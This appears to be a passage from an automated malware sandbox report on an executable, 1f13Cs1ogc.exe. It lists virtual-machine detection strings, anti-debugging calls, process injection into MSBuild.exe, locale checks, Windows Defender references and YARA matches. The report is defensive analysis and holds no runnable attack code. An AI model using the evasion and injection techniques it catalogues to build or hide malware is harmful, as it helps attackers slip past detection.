Source: Amcache.hve.7.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWP |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.7.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.7.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMware |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.7.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.7.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.7.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.7.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.7.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00FE7922 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
3_2_0041C03D |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h] |
0_2_00FE2003 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h] |
0_2_00FFA64C |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_01026628 mov eax, dword ptr fs:[00000030h] |
0_2_01026628 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h] |
0_2_00FF0F2E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h] |
3_2_00419750 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00FE7610 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00FE7922 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7AAF SetUnhandledExceptionFilter, |
0_2_00FE7AAF |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00FEDA73 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_0041AD48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041CEEA SetUnhandledExceptionFilter, |
3_2_0041CEEA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_0041B33A |
Source: Yara match |
File source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008 |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetACP,IsValidCodePage,GetLocaleInfoW, |
0_2_00FFC085 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FF622B |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC372 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC327 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00FFC498 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FFC40D |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FFC6EB |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00FFC814 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00FFC9E9 |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: GetLocaleInfoW, |
0_2_00FFC91A |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: EnumSystemLocalesW, |
0_2_00FF5D7F |
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe |
Code function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_00FE7815 |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.7.dr |
Binary or memory string: MsMpEng.exe |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |